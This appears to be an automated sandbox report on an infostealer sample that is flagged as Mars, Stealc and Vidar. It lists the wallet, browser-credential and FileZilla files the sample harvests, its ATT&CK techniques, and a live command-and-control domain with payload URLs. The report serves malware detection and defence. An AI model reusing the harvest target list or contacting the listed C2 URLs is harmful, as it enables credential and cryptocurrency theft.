Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.9$yT

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: c4RAHq3BNl.exe PID: 6488, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c4RAHq3BNl.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.c4RAHq3BNl.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.c4RAHq3BNl.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c4RAHq3BNl.exe PID: 6488, type: MEMORYSTR

Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8B0C40 sqlite3_bind_zeroblob,	0_2_6C8B0C40
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8B0D60 sqlite3_bind_parameter_name,	0_2_6C8B0D60
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7D8EA0 sqlite3_clear_bindings,	0_2_6C7D8EA0
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C8B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C8B0B40
Source: C:\Users\user\Desktop\c4RAHq3BNl.exe	Code function: 0_2_6C7D6410 bind,WSAGetLastError,	0_2_6C7D6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	4 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	143 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
c4RAHq3BNl.exe	42%	ReversingLabs	Win32.Trojan.Generic
c4RAHq3BNl.exe	45%	Virustotal		Browse
c4RAHq3BNl.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
shaffatta.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://mozilla.org0/	0%	URL Reputation	safe
https://shaffatta.com/L	0%	Avira URL Cloud	safe
https://shaffatta.com/M%	0%	Avira URL Cloud	safe
https://shaffatta.com/fdca69ae739b4897.php8ec24d29b45ae0b00693c3ad9a656	0%	Avira URL Cloud	safe
https://shaffatta.com/fdca69ae739b4897.php	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/AKJDHJKFHIEBFCGHCGHDGC	0%	Avira URL Cloud	safe
https://shaffatta.com/L	9%	Virustotal		Browse
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll)	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll	0%	Virustotal		Browse
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllu#	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll	12%	Virustotal		Browse
https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosK	0%	Avira URL Cloud	safe
https://shaffatta.com/(	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/nss3.dll3	0%	Avira URL Cloud	safe
https://shaffatta.com/ktop	0%	Avira URL Cloud	safe
https://shaffatta.com/	0%	Virustotal		Browse
https://shaffatta.co	0%	Avira URL Cloud	safe
https://shaffatta.com/:	0%	Avira URL Cloud	safe
https://shaffatta.com/fdca69ae739b4897.php	11%	Virustotal		Browse
https://shaffatta.com/d32e011d2eaa85a0/nss3.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll/$oT	100%	Avira URL Cloud	malware
https://shaffatta.com/t%	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll8	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/mozglue.dllG#	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllg$	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/fdca69ae739b4897.phpindows	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/fdca69ae739b4897.phption:	0%	Avira URL Cloud	safe
https://shaffatta.com	0%	Avira URL Cloud	safe
https://shaffatta.com/fatta.com/	0%	Avira URL Cloud	safe
https://shaffatta.com/fdca69ae739b4897.phpnts	0%	Avira URL Cloud	safe
https://shaffatta.com/fatta.com/X	0%	Avira URL Cloud	safe
https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll	100%	Avira URL Cloud	malware
https://shaffatta.com/amData	0%	Avira URL Cloud	safe
https://shaffatta.com/32e011d2eaa85a0/nss3.dll	0%	Avira URL Cloud	safe
https://shaffatta.com/fatta.com/DGIDAKEBAAKFCGHCBAKJDA	0%	Avira URL Cloud	safe
https://shaffatta.com/d3e	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
shaffatta.com	168.119.248.46	true	true	0%, Virustotal, Browse	unknown
www.google.com	142.250.176.196	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGKrV0LEGIjBS7GnGmqaZ9EWfyRGfksWN7UDK3EXq_-bjwYmJEf0C5nRkSFOpXYOxhCcsjI-KqzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://shaffatta.com/fdca69ae739b4897.php	false	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://shaffatta.com/d32e011d2eaa85a0/nss3.dll	false	Avira URL Cloud: malware	unknown
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll	false	Avira URL Cloud: malware	unknown
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll	false	Avira URL Cloud: malware	unknown
https://www.google.com/async/newtab_promos	false		high
https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll	false	Avira URL Cloud: malware	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGKrV0LEGIjCEBr3ti8UCkjxZ8z1bhLV56wHmRrKhu4Vx7PJg1CB49b8tfAh4AUocopkgP0IK5pYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/M%	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/fdca69ae739b4897.php8ec24d29b45ae0b00693c3ad9a656	c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/L	c4RAHq3BNl.exe, 00000000.00000003.2864517080.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2855764603.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899867172.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899830215.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://shaffatta.com/	c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/AKJDHJKFHIEBFCGHCGHDGC	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll)	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D410000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllu#	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosK	c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/(	c4RAHq3BNl.exe, 00000000.00000003.2864517080.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2855764603.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899867172.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899830215.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/d32e011d2eaa85a0/nss3.dll3	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/ktop	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.co	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://shaffatta.com/:	c4RAHq3BNl.exe, 00000000.00000003.2864517080.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899867172.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899830215.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	c4RAHq3BNl.exe, 00000000.00000002.3276790097.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	c4RAHq3BNl.exe, c4RAHq3BNl.exe, 00000000.00000002.3276907744.000000006C73D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		high
https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll/$oT	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://shaffatta.com/t%	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll8	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/d32e011d2eaa85a0/mozglue.dllG#	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllg$	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/fdca69ae739b4897.phpindows	c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/fdca69ae739b4897.phption:	c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
